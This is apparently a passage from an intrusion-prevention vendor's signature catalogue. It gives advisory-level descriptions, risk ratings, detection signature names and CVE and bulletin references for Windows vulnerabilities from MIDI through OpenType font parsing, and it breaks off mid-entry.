Microsoft-Windows-MIDI-Remote-Code-Execution-Vulnerability

About this vulnerability:

Detected an attempt to exploit a vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-433-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

Detected an attempt to exploit a vulnerability in Microsoft Windows

Situation:

File-Binary_Microsoft-Windows-MIDI-Remote-Code-Execution-Vulnerability

References:

CVE-2012-0003
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0003

BID-51292
http://www.securityfocus.com/bid/51292

MS12-004
http://technet.microsoft.com/security/bulletin/MS12-004

Microsoft-Windows-Mjpeg-Media-Decompression-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-402-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

A remote code execution vulnerability exists in Microsoft Windows DirectShow component. The vulnerability is caused by improper handling of compressed data in media files. An attacker can exploit this vulnerability by enticing a target user to open specially crafted media file. In attack scenarios where code execution is successful the injected code will be executed within the context of the currently logged in user. When code execution is not successful, the affected application may terminate abnormally, leading to a denial of service condition.

Situation:

HTTP_SS-Microsoft-Windows-Mjpeg-Media-Decompression-Code-Execution
File-RIFF_Microsoft-Windows-Mjpeg-Media-Decompression-Code-Execution

References:

CVE-2010-1880
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1880

BID-40464
http://www.securityfocus.com/bid/40464

OSVDB-65222
http://www.osvdb.org/65222

MS10-033
http://technet.microsoft.com/security/bulletin/MS10-033

Microsoft-Windows-MOTW-Security-Feature-Bypass-CVE-2024-30050

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1726-5242

Last changed:

sgpkg-ips-1726-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A bypass for the Mark of the Web security feature has been reported in Microsoft Windows.

Situation:

File-Binary_Microsoft-Windows-MOTW-Security-Feature-Bypass-CVE-2024-30050

References:

CVE-2024-30050
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-30050

ms24-may
http://technet.microsoft.com/security/bulletin/ms24-may

Microsoft-Windows-Movie-Maker-And-Producer-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Producer

Risk:

Moderate

First detected in:

sgpkg-ips-389-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Producer; Microsoft Windows Movie Maker

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in Microsoft Windows Movie Maker and Microsoft Producer. The flaw is due to the way the affected products parse maliciously crafted project files. A remote attacker can leverage this vulnerability by enticing a target user to open a malicious file. A successful attack can result in the injection and execution of arbitrary code on a target system. The resulting code would execute within the security context of the logged in user. In an unsuccessful attack, the affected application may abnormally terminate.

Situation:

HTTP_SS-Microsoft-Windows-Movie-Maker-And-Producer-Buffer-Overflow
File-OLE_Microsoft-Windows-Movie-Maker-And-Producer-Buffer-Overflow

References:

CVE-2010-0265
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0265

BID-38515
http://www.securityfocus.com/bid/38515

MS10-016
http://technet.microsoft.com/security/bulletin/MS10-016

Microsoft-Windows-Movie-Maker-Insecure-Library-Loading-CVE-2010-3967

About this vulnerability:

A vulnerability in Microsoft Movie Maker

Risk:

High

First detected in:

sgpkg-ips-362-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows Vista

Software:

Microsoft Windows Movie Maker

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Movie Maker.

Situation:

HTTP_CSU-Microsoft-Windows-Movie-Maker-Insecure-Library-Loading-CVE-2010-3967

References:

CVE-2010-3067
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3067

MS10-093
http://technet.microsoft.com/security/bulletin/MS10-093

Microsoft-Windows-Movie-Maker-Mediaclipstring-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows Movie Maker

Risk:

Moderate

First detected in:

sgpkg-ips-384-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Windows Movie Maker;

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in Microsoft Windows Movie Maker. The flaw is due to a boundary error in the way the affected product handles specially crafted MediaClipString data in a Movie Maker project file. A remote attacker can leverage this vulnerability by enticing a target user to open a malicious project file (.MSWMM). A successful attack can result in the injection and execution of arbitrary code on a target system. The resulting code would execute within the security context of the logged in user. In an unsuccessful attack, the affected application may abnormally terminate.

Situation:

HTTP_SS-Microsoft-Windows-Movie-Maker-Mediaclipstring-Buffer-Overflow
File-OLE_Microsoft-Windows-Movie-Maker-Mediaclipstring-Buffer-Overflow

References:

CVE-2010-2564
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2564

BID-42268
http://www.securityfocus.com/bid/42268

MS10-050
http://technet.microsoft.com/security/bulletin/MS10-050

Microsoft-Windows-MQ-Service-CVE-2025-21285-Null-Pointer-Dereference

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1841-5242

Last changed:

sgpkg-ips-1841-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

Errors when handling MSMQ traffic cause a null pointer dereference vulnerability in Windows. A successful exploitation allows an attacker to cause a denial of service condition on the target system.

Situation:

Generic_CS-Microsoft-Windows-Message-Queuing-Service-CVE-2025-21285-Null-Pointer-Dereference

References:

CVE-2025-21285
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21285

Microsoft-Windows-MSCOMCTL.OCX-RCE-Vulnerability

About this vulnerability:

Possibly malicious ActiveX in an OLE file

Risk:

Moderate

First detected in:

sgpkg-ips-468-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A malicious ActiveX control may allow remote code execution

Situation:

File-OLE_Microsoft-Windows-MSCOMCTL.OCX-RCE-Vulnerability
File-RTF_Microsoft-Windows-MSCOMCTL.OCX-RCE-Vulnerability

References:

CVE-2012-1856
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1856

MS12-060
http://technet.microsoft.com/security/bulletin/MS12-060

Microsoft-Windows-MSHTML-File-Extension-Spoofing-Remote-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1837-5242

Last changed:

sgpkg-ips-1837-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

Improper validation of file extensions causes a vulnerability in Windows which allows an attacker to spoof file names and entice users to open and execute malicious files.

Situation:

HTTP_CSU-Microsoft-Windows-MSHTML-File-Extension-Spoofing-Remote-Code-Execution

References:

CVE-2024-43461
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43461

Microsoft-Windows-MSHTML-Platform-Remote-Code-Execution-CVE-2023-35628

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1737-5242

Last changed:

sgpkg-ips-1752-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A remote code execution vulnerability has been reported in Microsoft Windows. The vulnerability is due to improper processing of file paths. A remote attacker could exploit this vulnerability by sending crafted requests to the target server or enticing a victim to open a crafted file or link. Successful exploitation could result in the code execution in the security context of the user.

Situation:

File-Text_Microsoft-Windows-MSHTML-Platform-Remote-Code-Execution-CVE-2023-35628
File-Binary_Microsoft-Windows-MSHTML-Platform-Remote-Code-Execution-CVE-2023-35628
File-TextId_Microsoft-Windows-MSHTML-Platform-Remote-Code-Execution-CVE-2023-35628

References:

CVE-2023-35628
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-35628

ms23-dec
http://technet.microsoft.com/security/bulletin/ms23-dec

Microsoft-Windows-MSI-File-Signature-Spoofing-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1272-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

There exists a spoofing vulnerability in Microsoft Windows. Successful exploitation could lead to spoofing of file content.

Situation:

File-OLE_Microsoft-Windows-MSI-File-Signature-Spoofing-Vulnerability

References:

CVE-2020-1464
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1464

Microsoft-Windows-Msvcrt.dll-Buffer-Overflow-CVE-2012-0150

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-440-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2008; Windows Vista; Windows 7

Software:

<os>

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Windows.

Situation:

File-TextId_Microsoft-Windows-Msvcrt.dll-Buffer-Overflow-CVE-2012-0150

References:

CVE-2012-0150
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0150

MS12-013
http://technet.microsoft.com/security/bulletin/MS12-013

Microsoft-Windows-NAT-Driver-Denial-Of-Service

About this vulnerability:

A vulnerability in Microsoft Windows Server

Risk:

High

First detected in:

sgpkg-ips-595-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2012

Software:

<os>

Type:

Malfunction

Description:

A denial-of-service vulnerability exists in Microsoft Windows' NAT driver. The vulnerability is due to insufficient validation of memory addresses when handling crafted ICMP packets. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted ICMP packet. Successful exploitation of this vulnerability would cause the operating system to become unresponsive resulting in a denial-of-service condition.

Situation:

ICMP_Microsoft-Windows-NAT-Driver-Denial-Of-Service

References:

CVE-2013-3182
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3182

OSVDB-96195
http://www.osvdb.org/96195

MS13-064
http://technet.microsoft.com/security/bulletin/MS13-064

Microsoft-Windows-NAT-Helper-DNS-Query-Denial-Of-Service

About this vulnerability:

Denial of service vulnerability in Microsoft Windows NAT Helper

Risk:

Moderate

First detected in:

sgpkg-ips-84-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP

Software:

<os>

Type:

Malfunction

Description:

There is a denial of service vulnerability in Microsoft Windows NAT Helper. By sending a malformed DNS query to the vulnerable service, a remote attacker can cause a null pointer deference error leading to a denial of service.

Situation:

DNS-TCP_Microsoft-Windows-NAT-Helper-DNS-Query-Denial-Of-Service
DNS-UDP_Microsoft-Windows-NAT-Helper-DNS-Query-Denial-Of-Service

References:

CVE-2006-5614
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5614

BID-20804
http://www.securityfocus.com/bid/20804

OSVDB-30096
http://www.osvdb.org/30096

Microsoft-Windows-Network-File-System-CVE-2022-30136-Remote-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1483-5242

Last changed:

sgpkg-ips-1483-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

Improper handling of NFSv4 requests causes a vulnerability in Windows. A successful exploit allows an attacker to execute arbitrary code on the target system or crash it.

Situation:

Generic_CS-Microsoft-Windows-Network-File-System-CVE-2022-30136-Remote-Code-Execution

References:

CVE-2022-30136
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30136

Microsoft-Windows-NFS-CVE-2022-26937

About this vulnerability:

A vulnerability in the handling of NFS requests

Risk:

High

First detected in:

sgpkg-ips-1466-5242

Last changed:

sgpkg-ips-1476-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There exists a unauthenticated remote code execution vulnerability in Windows NFS. Successful exploitation could lead in arbitrary code execution.

Situation:

SunRPC_TCP-Windows-NFS-CVE-2022-26937

References:

CVE-2022-26937
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26937

ms22-may
http://technet.microsoft.com/security/bulletin/ms22-may

Microsoft-Windows-NFS-CVE-2022-34715-RCE-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Windows Network File System.

Risk:

High

First detected in:

sgpkg-ips-1502-5242

Last changed:

sgpkg-ips-1502-5242

Platform:

Windows

Software:

Windows Server

Type:

Buffer Overflow

Description:

A vulnerability in Microsoft Windows Network File System, for Microsoft Windows Server 2022 and Microsoft Windows Server 2022 (Server Core installation), which allows remote attackers to execute arbitrary code by sending crafted requests, due to a out-of-bounds write to the ACE_Count field.

Situation:

Generic_CS-Microsoft-Windows-NFS-CVE-2022-34715-RCE-Vulnerability

References:

CVE-2022-34715
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34715

Microsoft-Windows-NFS-Server-CVE-2020-17047

About this vulnerability:

A vulnerability in the Microsoft Windows NFS server

Risk:

Moderate

First detected in:

sgpkg-ips-1295-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

There exists an input validation error in the Microsoft Windows NFS server.

Situation:

SunRPC_TCP-Microsoft-Windows-NFS-Server-CVE-2020-17047

References:

CVE-2020-17047
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17047

ms20-nov
http://technet.microsoft.com/security/bulletin/ms20-nov

Microsoft-Windows-NFS-Server-CVE-2020-17051

About this vulnerability:

A vulnerability in the Microsoft Windows NFS server

Risk:

High

First detected in:

sgpkg-ips-1295-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

There exists an input validation error in the Microsoft Windows NFS server.

Situation:

Generic_UDP-Microsoft-Windows-NFS-Server-CVE-2020-17051
SunRPC_TCP-Microsoft-Windows-NFS-Server-CVE-2020-17051

References:

CVE-2020-17051
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17051

ms20-nov
http://technet.microsoft.com/security/bulletin/ms20-nov

Microsoft-Windows-NFS-Server-CVE-2020-17056

About this vulnerability:

A vulnerability in the Microsoft Windows NFS server

Risk:

High

First detected in:

sgpkg-ips-1295-5242

Last changed:

sgpkg-ips-1317-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

There exists an input validation error in the Microsoft Windows NFS server.

Situation:

Generic_UDP-Microsoft-Windows-NFS-Server-CVE-2020-17056
SunRPC_TCP-Microsoft-Windows-NFS-Server-CVE-2020-17056
SunRPC_TCP-Microsoft-Windows-NFS-Server-NLM-Information-Disclosure

References:

CVE-2020-17056
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17056

ms20-nov
http://technet.microsoft.com/security/bulletin/ms20-nov

Microsoft-Windows-Nfs-Server-Null-Pointer-Dereference

About this vulnerability:

A vulnerability in Microsoft Windows Server

Risk:

Moderate

First detected in:

sgpkg-ips-511-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Windows Server

Type:

Malfunction

Description:

A denial-of-service vulnerability has been reported in Microsoft Windows NFS Server. The vulnerability is caused by a NULL pointer dereference that can occur when an invalid NFS file operation is requested on a read-only share. A remote attacker can exploit this vulnerability by sending a malicious NFS request. Successful exploitation can lead to a denial-of-service condition of the target system.

Situation:

Analyzer-Microsoft-Windows-Nfs-Server-Null-Pointer-Dereference
Generic_CS-Microsoft-Windows-Nfs-Server-Null-Pointer-Dereference
Generic_SS-Microsoft-Windows-Nfs-Server-Null-Pointer-Dereference

References:

CVE-2013-1281
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1281

BID-57853
http://www.securityfocus.com/bid/57853

OSVDB-90129
http://www.osvdb.org/90129

MS13-014
http://technet.microsoft.com/security/bulletin/MS13-014

Microsoft-Windows-NFS-Server-RCE-CVE-2021-26432

About this vulnerability:

A vulnerability in the Microsoft Windows NFS server

Risk:

High

First detected in:

sgpkg-ips-1376-5242

Last changed:

sgpkg-ips-1376-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

An out-of-bound vulnerability exists in the Microsoft Windows NFS server. Successful exploitation may lead to remote code execution.

Situation:

Generic_UDP-Microsoft-Windows-NFS-Server-RCE-CVE-2021-26432

References:

CVE-2021-26432
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26432

ms21-aug
http://technet.microsoft.com/security/bulletin/ms21-aug

Microsoft-Windows-NT-4.0-DHCP-Server-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows NT 4.0 DHCP Server

Risk:

Moderate

First detected in:

sgpkg-ips-1060-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

There exists a buffer overflow vulnerability in Windows NT Server 4.0.

Situation:

BOOTP_CS-Microsoft-Windows-NT-4.0-DHCP-Server-Buffer-Overflow

References:

CVE-2009-0900
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0900

Microsoft-Windows-NTLM-Hash-Disclosure-Vulnerability-CVE-2025-21377

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Windows detected

Risk:

High

First detected in:

sgpkg-ips-1835-5242

Last changed:

sgpkg-ips-1835-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

An NTLM hash disclosure issue has been reported in Microsoft Windows.

Situation:

File-Text_Suspicious-Internet-Shortcut-File
File-TextId_Suspicious-Internet-Shortcut-File

References:

CVE-2025-21377
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21377

ms25-feb
http://technet.microsoft.com/security/bulletin/ms25-feb

Microsoft-Windows-NTLM-Message-Integrity-Check-Tampering

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1180-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

There has been reported a tampering vulnerability in the NTLM component of Microsoft Windows. Successful exploitation can lead in modification of the NTLM packet.

Situation:

SMB-TCP_CHS-Microsoft-Windows-NTLM-Message-Integrity-Check-Tampering

References:

CVE-2019-1040
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1040

Microsoft-Windows-NTLM-Relay-CVE-2025-24054

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1862-5242

Last changed:

sgpkg-ips-1862-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

An NTLM relay vulnerability has been reported in Microsoft Windows. The vulnerability is due to improper validation of search connector and library files. A remote attacker could exploit this vulnerability by enticing a target user in to downloading a crafted search connector or library description file. Successfully exploiting this vulnerability could result in the disclosure of a targeted user's NTLM hash.

Situation:

File-TextId_Microsoft-Windows-NTLM-Relay-CVE-2025-24054
File-Name_Search-Connector-Description-File-Transfer
File-Name_Shell-Library-Description-File-Transfer

References:

CVE-2025-24054
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-24054

Microsoft-Windows-Object-Packager-Remote-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-612-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A remote code execution vulnerability has been reported in Microsoft Windows Object Packager. The vulnerability is due to insufficient validation of certain files which can cause the OLE packager to download and execute arbitrary code. A remote attacker can exploit this vulnerability by enticing a user to download a maliciously crafted file. This can result in code execution in the context of the affected user.

Situation:

File-OLE_Microsoft-Windows-Object-Packager-Remote-Code-Execution
File-TextId_Microsoft-Windows-Object-Packager-Remote-Code-Execution

References:

CVE-2014-4114
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4114

BID-70419
http://www.securityfocus.com/bid/70419

OSVDB-113140
http://www.osvdb.org/113140

MS14-060
http://technet.microsoft.com/security/bulletin/MS14-060

Microsoft-Windows-OLE-Automation-Heap-Overrun

About this vulnerability:

A memory corruption vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-157-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000; Windows Vista; Windows XP

Software:

<os>

Type:

Buffer Overflow

Description:

There is a memory corruption vulnerability in the Microsoft Object Linking and Embedding (OLE) Automation component. The flaw is due to an integer overflow when handling crafted OLE stream data. Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the vulnerable system with privileges of the currently logged-in users.

Situation:

HTTP_SS-Microsoft-OLE-Automation-Heap-Overrun
File-OLE_Microsoft-OLE-Automation-Heap-Overrun

References:

CVE-2007-0065
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0065

BID-27661
http://www.securityfocus.com/bid/27661

MS08-008
http://technet.microsoft.com/security/bulletin/MS08-008

Microsoft-Windows-OLE-CVE-2014-6332

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-615-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A vulnerability in Microsoft Windows

Situation:

File-Text_Microsoft-Windows-OLE-CVE-2014-6332

References:

CVE-2014-6332
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6332

MS14-064
http://technet.microsoft.com/security/bulletin/MS14-064

Microsoft-Windows-OLE-CVE-2016-0091-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-745-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

A crafted OLE file can be used to gain code execution on the affected host.

Situation:

File-OLE_Microsoft-Windows-OLE-CVE-2016-0091-Code-Execution
File-RTF_Microsoft-Windows-OLE-CVE-2016-0091-Code-Execution

References:

CVE-2016-0091
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0091

MS16-030
http://technet.microsoft.com/security/bulletin/MS16-030

Microsoft-Windows-OLE-CVE-2016-0092-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-747-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

Improper parsing of OLE objects can result in an attacker being able to execute code on Windows.

Situation:

File-OLE_Microsoft-Windows-OLE-CVE-2016-0092-Code-Execution
File-RTF_Microsoft-Windows-OLE-CVE-2016-0092-Code-Execution

References:

CVE-2016-0092
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0092

MS16-030
http://technet.microsoft.com/security/bulletin/MS16-030

Microsoft-Windows-OLE-CVE-2016-0153-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-756-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There exists a code execution vulnerability in Microsoft Windows OLE.

Situation:

File-OLE_Microsoft-Windows-OLE-CVE-2016-0153-Code-Execution
File-TextId_Microsoft-Windows-OLE-CVE-2016-0153-Code-Execution

References:

CVE-2016-0153
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0153

MS16-044
http://technet.microsoft.com/security/bulletin/MS16-044

Microsoft-Windows-OLE-CVE-2017-8487-Global-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows Server 2003

Risk:

Moderate

First detected in:

sgpkg-ips-945-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

Improper validation of files embedded in an OLE file causes a buffer overflow vulnerability in Windows XP and 2003. A successful attack allows execution of arbitrary code with user privileges.

Situation:

File-Binary_Microsoft-Windows-OLE-CVE-2017-8487-Global-Buffer-Overflow

References:

CVE-2017-8487
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8487

Microsoft-Windows-OLE-Packer-Remote-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Office PowerPoint

Risk:

Moderate

First detected in:

sgpkg-ips-614-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A remote code execution vulnerability has been reported in Microsoft Windows. The vulnerability is due to improper processing of files containing OLE objects. A remote attacker can exploit this vulnerability by enticing a user to open a specially crafted Microsoft Office file using the vulnerable software. This can result in arbitrary code execution on an affected machine with the privileges of the user.

Situation:

File-OLE_Microsoft-Windows-OLE-Packer-Remote-Code-Execution

References:

CVE-2014-6352
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6352

BID-70690
http://www.securityfocus.com/bid/70690

OSVDB-113140
http://www.osvdb.org/113140

MS14-064
http://technet.microsoft.com/security/bulletin/MS14-064

Microsoft-Windows-OpenType-Compact-Font-Format-Driver-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-410-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

A code execution vulnerability exists in Microsoft Windows OpenType Compact Font Format (CFF) Driver. The vulnerability is due to the OpenType Compact Font Format (CFF) Driver not sufficiently validating the parameter values of specially crafted OpenType fonts. On Windows XP and Windows Server 2003 systems an attacker must have valid logon credentials in order to log on locally to exploit this vulnerability. On Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2 systems, an attacker could host a specially crafted OpenType font on a network share and then entice a user to navigate to the share in Windows Explorer. The vulnerability is triggered in the Details and Preview panes. In attack scenarios where code execution is successful the injected code will run in kernel mode. In situations where code execution fails, the vulnerable application may terminate abnormally.

Situation:

File-Binary_Microsoft-Windows-OpenType-Compact-Font-Format-BOF

References:

CVE-2011-0033
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0033

BID-46106
http://www.securityfocus.com/bid/46106

OSVDB-70821
http://www.osvdb.org/70821

MS11-007
http://technet.microsoft.com/security/bulletin/MS11-007

Microsoft-Windows-OpenType-Font-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-833-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Microsoft Windows detected

Situation:

File-Binary_Microsoft-Windows-OpenType-Font-Memory-Corruption

References:

CVE-2016-7256
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7256

MS16-132
http://technet.microsoft.com/security/bulletin/MS16-132

Microsoft-Windows-OpenType-Font-Parsing-Heap-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-401-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

A heap buffer overflow vulnerability exists in Microsoft Windows Adobe Type Manager (ATM) library for OpenType Font parsing. The vulnerability is due to insufficient validation of a value while processing the Naming Table inside OpenType font. Remote attackers can exploit this vulnerability by enticing target users to view a maliciously crafted font in an application that utilizes the affected library, such as Windows FontViewer. Successful exploitation of this vulnerability would result in arbitrary code execution within the kernel. In case of an unsuccessful code injection attack, the affected system will crash, causing denial of service condition.

Situation:

HTTP_SS-Microsoft-Windows-OpenType-Font-Parsing-Heap-Overflow
File-Binary_Microsoft-Windows-OpenType-Font-Parsing-Heap-Overflow

References:

CVE-2010-2740
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2740

BID-43778
http://www.securityfocus.com/bid/43778

MS10-078
http://technet.microsoft.com/security/bulletin/MS10-078

Microsoft-Windows-OpenType-Font-Parsing-Stack-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-407-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP; Windows 2003; Windows Vista; Windows 2008; Windows 7; Windows 2008 R2

Software:

<os>

Type:

Buffer Overflow

Description:

An integer overflow vulnerability exists in the Microsoft Windows OpenType Font (OTF) driver. The vulnerability is due to insufficient validation of a calculation involving a FontMatrix value while processing the Compact Font Format data inside an OpenType font. Remote attackers can exploit this vulnerability by enticing target users to view a maliciously crafted font in an application that utilizes the affected library, such as Windows FontViewer. Successful exploitation would possibly result in code execution in the security context of Ring 0 (kernel). If code execution is unsuccessful, the affected system will terminate and result in BSoD.

Situation:

HTTP_SS_Microsoft-Windows-OpenType-Font-Parsing-Stack-Overflow
File-Binary_Microsoft-Windows-OpenType-Font-Parsing-Stack-Overflow

References:

CVE-2011-0034
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0034

MS11-032
http://technet.microsoft.com/security/bulletin/MS11-032

Microsoft-Windows-OpenType-Font-Validation-Integer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-379-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Integer Overflow

Description:

An integer overflow vulnerability exists in Microsoft Windows OpenType format driver. The vulnerability is due to insufficient validation of an integer value while processing the Font Table Directory inside OpenType font. Remote attackers can exploit this vulnerability by enticing target users to view a maliciously crafted font in an application that utilizes the affected font engine, such as Windows Font Viewer. Successful exploitation of this vulnerability would result in arbitrary code execution within the kernel. In case of an unsuccessful code injection attack, the affected system will crash, causing denial of service condition.

Situation:

HTTP_SS-Microsoft-Windows-OpenType-Font-Validation-Integer-Overflow
File-Binary_Microsoft-Windows-OpenType-Font-Validation-Integer-Overflow

References:

CVE-2010-2741
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2741

BID-43779
http://www.securityfocus.com/bid/43779

MS10-078
http://technet.microsoft.com/security/bulletin/MS10-078

Microsoft-Windows-OTF-Fonts-Kernel-Vulnerability-CVE-2015-2426

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-663-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

